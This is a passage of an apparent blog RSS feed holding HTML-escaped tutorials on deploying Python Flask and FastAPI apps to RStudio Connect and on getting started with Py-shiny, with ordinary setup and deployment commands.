&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we deploy we will also need to tell RStudio Connect where our app is located. We do this with an &lt;code&gt;--entrypoint&lt;/code&gt; flag which is of the form &lt;em&gt;module name:object name&lt;/em&gt;. By default RStudio Connect will look for an entrypoint of &lt;em&gt;app:app&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;We are now ready to deploy our ML API by running,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect deploy fastapi -n &amp;lt;server nickname&amp;gt; . --entrypoint fastapi_ml:app
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;from the &lt;code&gt;fastapi-deploy-demo&lt;/code&gt; directory.&lt;/p&gt;
&lt;p&gt;Your ML API has now been deployed! You can check the deployment by following the output links which will take you to your API on RStudio Connect.&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;If you wish to learn more about FastAPI or deploying applications to RStudio Connect you may be interested in the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://fastapi.tiangolo.com/tutorial/" rel="external"&gt;FastAPI user guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/connect/user/publishing/" rel="external"&gt;Publishing to RStudio Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-posit-connect-deployment-management/" rel="external"&gt;Introduction to RStudio Connect course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python API deployment with RStudio Connect: Flask</title><link>https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/</link><pubDate>Thu, 25 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/flask.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Python API deployment with RStudio Connect: Flask (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi" rel="external"&gt;Part 2: Python API deployment with RStudio Connect: FastAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit" rel="external"&gt;Part 3: Python API deployment with RStudio Connect: Streamlit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/" rel="external"&gt;RStudio&lt;/a&gt; recently announced they are changing to &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;. Their publishing platform RStudio Connect (-&amp;gt; Posit Connect) is well known for providing the ability to deploy and share R applications such as &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; apps and &lt;a href="https://www.rplumber.io/" rel="external"&gt;Plumber&lt;/a&gt; APIs as well as plots, models and &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;RMarkdown&lt;/a&gt; reports. However, it is not just for R developers. RStudio Connect also supports a growing number of Python applications. Indeed &lt;a href="https://posit.co/" rel="external"&gt;posit.co&lt;/a&gt; states they are&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;embracing multi-lingual data science, creating open source and commercial software for R, Python, and beyond.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;One of the Python applications you can deploy to RStudio Connect is &lt;a href="https://flask.palletsprojects.com/en/2.1.x/" rel="external"&gt;Flask&lt;/a&gt;. Flask is a &lt;a href="https://wsgi.readthedocs.io/en/latest/" rel="external"&gt;WSGI&lt;/a&gt; (Web Server Gateway Interface) web application framework and provides a Python interface to enable the building of web APIs. It is useful to data scientists, for example for building interactive web dashboards and visualisations of data, as well as APIs for machine learning models. Deploying a Flask app to a publishing platform such as RStudio Connect means it can then be used from anywhere and can be easily shared with clients.&lt;/p&gt;
&lt;p&gt;This blog post focuses on how to deploy a Flask app to RStudio Connect. We will use a simple example but won&amp;rsquo;t go into detail on how to create Flask apps. If you are getting started in Flask you may find this &lt;a href="https://flask.palletsprojects.com/en/2.1.x/tutorial/" rel="external"&gt;tutorial&lt;/a&gt; useful.&lt;/p&gt;
&lt;h2 id="creating-your-first-flask-app"&gt;Creating your first Flask app&lt;/h2&gt;
&lt;p&gt;First things first, we will need to create a project directory and install Flask in a virtual environment.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a project directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir flask-deploy-demo &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd flask-deploy-demo
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a virtual environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install flask&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install flask
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For this example we will just use a basic hello world app. Create a file for the app with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch flask_demo.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and copy in the code below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# flask_demo.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;flask&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Flask
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Flask(&lt;span style="color:#79c0ff"&gt;__name__&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.route&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hello&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Hello, World!&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can check then our app is working by running it locally. By default Flask looks for an application called &lt;code&gt;app.py&lt;/code&gt; or &lt;code&gt;wsgi.py&lt;/code&gt; in the current directory. As we have called our app something different we will need to first set a &lt;code&gt;FLASK_APP&lt;/code&gt; environment variable so that Flask knows where to look. You can set this variable in a &lt;code&gt;.env&lt;/code&gt; or &lt;code&gt;.flaskenv&lt;/code&gt; file and source it with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export FLASK_APP=&amp;#34;flask_demo&amp;#34;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can deploy our app locally with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;flask run
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and check it is working by following the output link http://127.0.0.1:5000.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-deploy-flask-rsconnect"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="deploying-to-rstudio-connect"&gt;Deploying to RStudio Connect&lt;/h2&gt;
&lt;h3 id="adding-a-server"&gt;Adding a server&lt;/h3&gt;
&lt;p&gt;Now we have our Flask app we want to deploy it to a server such as RStudio Connect. To do this we will use the CLI (Command Line Interface) deployment tool &lt;code&gt;rsconnect-python&lt;/code&gt;. This can be installed with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install rsconnect-python
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will then need to add the server which we want to deploy to. However, before we do this we will need to first create an API key. Log into RStudio Connect and click on your user icon in the top left corner, navigate to &amp;ldquo;API Keys&amp;rdquo; and add a new API key.&lt;/p&gt;
&lt;p&gt;&lt;img alt="user menu icon" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/menu.png" width="1003"&gt;&lt;/p&gt;
&lt;p&gt;Remember to save the API key somewhere as it will only be shown to you once!&lt;/p&gt;
&lt;p&gt;It is also useful to set an API key environment variable in our &lt;code&gt;.env&lt;/code&gt; file. This can be done by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export CONNECT_API_KEY=&amp;lt;your_api_key&amp;gt;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you wish you could also add an environment variable for the server you are using,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;CONNECT_SERVER&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;your server url&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note the server url will be the part of the url that comes before &lt;code&gt;connect/&lt;/code&gt; and must include a trailing slash.&lt;/p&gt;
&lt;p&gt;Now we can add the server with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect add --server &lt;span style="color:#79c0ff"&gt;$CONNECT_SERVER&lt;/span&gt; --name &amp;lt;server nickname&amp;gt; --api-key &lt;span style="color:#79c0ff"&gt;$CONNECT_API_KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check the server has been added and view its details with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="deploying-your-flask-app"&gt;Deploying your Flask App&lt;/h3&gt;
&lt;p&gt;Before we deploy our app, there is one more thing to watch out for. Unless you have a &lt;code&gt;requirements.txt&lt;/code&gt; file in the same directory as your app, RStudio Connect will freeze your current environment. Therefore, make sure you run the deploy command from the virtual environment that you created your Flask app in and wish it to run in on the server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Aside&lt;/strong&gt; When writing this blog I found there is a bug in pip/ubuntu which adds &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; when freezing the environment. This causes an error when trying to deploy. To get around this you can create a &lt;code&gt;requirements.txt&lt;/code&gt; file for your current environment and exclude &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip freeze | grep -v &lt;span style="color:#a5d6ff"&gt;&amp;#34;pkg-resources&amp;#34;&lt;/span&gt; &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We are now ready to deploy our app by running,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect deploy api -n &amp;lt;server nickname&amp;gt; . --entrypoint flask_demo:app
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;from the &lt;code&gt;flask-deploy-demo&lt;/code&gt; directory.&lt;/p&gt;
&lt;p&gt;Here we have used the flag &lt;code&gt;--entrypoint&lt;/code&gt;. This tells RStudio Connect where our app is located. It is of the form &lt;em&gt;module name:object name&lt;/em&gt;. By default RStudio Connect will look for an entrypoint of the form &lt;em&gt;app:app&lt;/em&gt; so if you have used these names then you won&amp;rsquo;t need to specify the entrypoint flag.&lt;/p&gt;
&lt;p&gt;And just like that our app is deployed and ready to share!&lt;/p&gt;
&lt;p&gt;You can check your deployment was successful by following the &amp;ldquo;Dashboard content URL&amp;rdquo; which will take you to your published API on RStudio Connect.&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;If you wish to learn more about Flask or deploying applications to RStudio Connect you may be interested in the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://flask.palletsprojects.com/en/2.1.x/quickstart/" rel="external"&gt;Flask quickstart&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/connect/user/publishing/" rel="external"&gt;Publishing to RStudio Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-flask/" rel="external"&gt;Recreating a Shiny app with Flask&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-posit-connect-deployment-management/" rel="external"&gt;Introduction to RStudio Connect course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hello Shiny Python</title><link>https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/</link><pubDate>Tue, 23 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/shinylive.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We would &lt;a href="https://posit.co/" rel="external"&gt;posit&lt;/a&gt; (see what we did there) that R-&lt;a href="https://shiny.rstudio.com/" rel="external"&gt;{shiny}&lt;/a&gt; has been a boon for data science practitioners
using the R language over the last decade. We know that in our Python work, we have certainly been clamouring for something of the same ilk. And
whilst there are other frameworks that we also like, streamlit and dash to name a couple, neither of them has filled us with the same excitement and confidence
that shiny did in R to build both simple and complex bespoke web applications. With &lt;del&gt;RStudio&lt;/del&gt; Posit conf in action the big news from July 27th was the alpha release of Py-&lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;{shiny}&lt;/a&gt; which was a source of great interest for us, so we couldn&amp;rsquo;t resist installing and starting to build.&lt;/p&gt;
&lt;p&gt;If you are familiar with R-shiny already, then much of the py-shiny package will feel familiar to you (albeit with a couple of things having been renamed). However we will approach the rest of this post assuming that a reader does not have that prior experience and take you through building a simple shiny application to display plots on subsets of a dataset.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-hello-shiny-python"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="installing"&gt;Installing&lt;/h2&gt;
&lt;p&gt;As it is released on pypi.org, installing shiny is trivial as with any other python package. We can set up a virtual environment with shiny and the other dependencies we will use as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;virtualenv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install shiny plotnine
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="creating-an-application"&gt;Creating an application&lt;/h2&gt;
&lt;p&gt;An application is composed of two parts, the user interface (UI) front end that the end user will use to navigate your application and a server function which defines the logic of your application.&lt;/p&gt;
&lt;p&gt;The UI functions in the shiny library just generate html, css and JavaScript code which will be shipped to the browser and rendered. A basic page might be created with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Shiny Python&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you were to print this object out to the console you will see the html tags that are being generated&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;html&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;body&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;div class=&amp;#34;container-fluid&amp;#34;&amp;gt;Hello Shiny Python&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;digging into the source a little deeper we can find that it will also include bootstrap and jquery as dependencies. These packages will provide the backbone for the default visuals of html elements and the communication between client side browser and back end logic.&lt;/p&gt;
&lt;p&gt;To run an app we also need a server function, the server function has 3 parameters,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;input: An object that contains the bindings to values being set by the client side JavaScript&lt;/li&gt;
&lt;li&gt;output: An object that will allow us to send responses back to our front end&lt;/li&gt;
&lt;li&gt;session: An object that contains data and methods related to a specific user session&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To display our front end we could define a simple server function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# of course this server won&amp;#39;t do anything useful, but is&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# enough to run an app to display our current UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And finally create a &lt;code&gt;shiny.App&lt;/code&gt; object to link the two things together&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(frontend, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full source, which, for this blog post, we&amp;rsquo;ve called &amp;ldquo;hello.py&amp;rdquo;, for this trivial example would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# hello.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui, App
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Shiny Python&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(input, output, session):
